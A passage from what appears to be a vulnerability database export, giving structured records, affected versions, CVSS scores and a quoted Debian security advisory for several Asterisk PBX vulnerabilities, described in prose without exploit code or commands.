"id": "CVE-2023-49786"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-31T06:13:00",
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"date": "2023-12-29T00:15:50.043000",
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Vulnerabilities related to race conditions in products from multiple vendors such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
}
],
"trust": 0.8
}
}
VAR-202312-1059
Vulnerability from variot - Updated: 2024-01-18 22:29Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49294
It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.
CVE-2023-49786
Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-1059",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.0"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20.5.0",
"versionStartIncluding": "19.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "18.20.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-37457",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.2,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-37457",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-37457",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-37457",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49294\n\n It is possible to read any arbitrary file even when the `live_dangerously`\n option is not enabled. \n\nCVE-2023-49786\n\n Asterisk is susceptible to a DoS due to a race condition in the hello\n handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n setup. This attack can be done continuously, thus denying new DTLS-SRTP\n encrypted calls during the attack. Abuse of this vulnerability may lead to\n a massive Denial of Service on vulnerable Asterisk servers for calls that\n rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37457"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37457",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020247",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"id": "VAR-202312-1059",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-01-18T22:29:19.418000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-98rc-4j27-74hh"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.260000",
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T02:56:00",
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"date": "2023-12-29T00:15:49.697000",
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Classic buffer overflow vulnerabilities in products from multiple vendors",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
}
],
"trust": 0.8
}
}
VAR-201905-0637
Vulnerability from variot - Updated: 2023-12-18 13:02asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0637",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "eq",
"trust": 2.4,
"vendor": "digium",
"version": "13.10.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"cve": "CVE-2016-7550",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
